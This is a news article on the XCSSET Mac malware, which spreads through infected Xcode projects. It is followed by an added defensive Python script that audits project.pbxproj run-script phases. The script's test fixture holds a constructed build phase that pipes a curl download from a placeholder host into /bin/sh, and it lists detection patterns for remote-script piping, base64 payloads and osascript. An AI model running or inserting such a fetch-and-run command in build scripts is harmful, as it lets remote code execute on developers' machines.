Cybercriminals are corrupting Mac applications from source and contaminating benign open source projects with malware
Running infected applications can direct users to dangerous websites, change the addresses of cryptocurrency wallets, take screenshots while browsing, and steal credit cards
The malware also replaces Safari with a malicious version of Apple's browser, infects all other major browsers, steals usernames and passwords for Google, Apple ID, PayPal, Skype, Telegram, Evernote, and WeChat, or installs ransomware
To protect yourself, make sure you are running the best Mac antivirus software. Also, for the time being, only install apps from Apple's App Store
Trend Micro, the antivirus maker that discovered the malware, called it a "rabbit hole of malicious payloads" in a blog post last week
The malware, which Trend Micro calls XCSSET, once complete, profiles the system and infects any version of the Brave, Firefox, Opera, 360, and Yandex browsers that may be installed. If Google Chrome is installed, this malware replaces it with an older version of Chrome with weaker security
However, this is nothing compared to what is done to Safari. The malware downloads and installs a malicious version of Safari so that internal links to the real Safari jump to the fake Safari
"Functionally, this means that a fake Safari browser runs instead of the legitimate version of Safari," states a Trend Micro white paper on the XCSSET malware
So far, Trend Micro has confirmed that XCSSET has infected two Mac open source projects; infection of iOS apps has not been confirmed
If this sounds familiar, something similar has happened before: in 2015, a malicious version of Apple's development platform Xcode was distributed in China. As a result, Mac and iOS apps created with the corrupted version of Xcode became corrupted themselves. Apple promptly removed the tainted apps from its app store
So why is it happening again? This time, the scammers are attacking a bit more downstream: instead of attacking Xcode itself, they are targeting projects on online code repositories such as GitHub
"Malicious code is injected into a local Xcode project, and when the project is built, the malicious code is executed," Trend Micro said
Unwitting software developers release applications with their own legitimate signatures, so infected applications are not always stopped by Apple's own built-in security safeguards
"Methods to verify distributed files (such as checking for hashes) are not helpful because developers are not aware that they are distributing malicious files," Trend Micro added
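Because the developer signs whatever the build produced, the check has to happen before the build, in the project itself. The following added example (not code from the article, Trend Micro, or Apple) scans an Xcode project.pbxproj for run-script build phases and flags scripts a reviewer would not expect in a legitimate build step; it assumes injected build-time code lands in a PBXShellScriptBuildPhase entry, which the article does not state, and the project fragment and placeholder URL are constructed.

```python
import re

# Added example (not from the article or Trend Micro). Assumption: code that
# runs "when the project is built" lives in PBXShellScriptBuildPhase entries.

# Constructed project.pbxproj fragment: one benign phase, one fetching remote code.
SAMPLE_PBXPROJ = r'''
/* Begin PBXShellScriptBuildPhase section */
		AA01 /* Lint */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "swiftlint --quiet\n";
		};
		AA02 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			shellPath = /bin/sh;
			shellScript = "curl -fsSL https://placeholder.invalid/s | /bin/sh\necho \"done\"\n";
		};
/* End PBXShellScriptBuildPhase section */
'''

PHASE_RE = re.compile(
    r'(\w+) /\* (.*?) \*/ = \{\s*isa = PBXShellScriptBuildPhase;(.*?)\};', re.S)
SCRIPT_RE = re.compile(r'shellScript = "((?:\\.|[^"\\])*)";', re.S)

# Patterns a reviewer would not expect in a legitimate build step.
SUSPICIOUS = [
    (r'\b(curl|wget)\b[^|\n]*\|\s*(/bin/)?(ba|z)?sh\b', 'remote script piped to shell'),
    (r'\bbase64\b.*(-d\b|--decode)', 'base64-decoded payload'),
    (r'\bosascript\b', 'AppleScript execution'),
    (r'\beval\b', 'eval of dynamic content'),
]

def unescape(s):
    # pbxproj strings use C-style escapes: \n, \t, \", \\
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m[1], m[1]), s)

def audit_pbxproj(text):
    """Return [(phase_id, name, script, findings)] for every run-script phase."""
    results = []
    for pid, name, body in PHASE_RE.findall(text):
        m = SCRIPT_RE.search(body)
        script = unescape(m[1]) if m else ''
        hits = [why for pat, why in SUSPICIOUS if re.search(pat, script, re.S)]
        results.append((pid, name, script, hits))
    return results

if __name__ == '__main__':
    for pid, name, script, hits in audit_pbxproj(SAMPLE_PBXPROJ):
        print('REVIEW' if hits else 'ok', pid, name, hits or repr(script.strip()))
```

Run it against a real project with `audit_pbxproj(open('App.xcodeproj/project.pbxproj').read())`; the heuristics are a starting point for review, not a verdict.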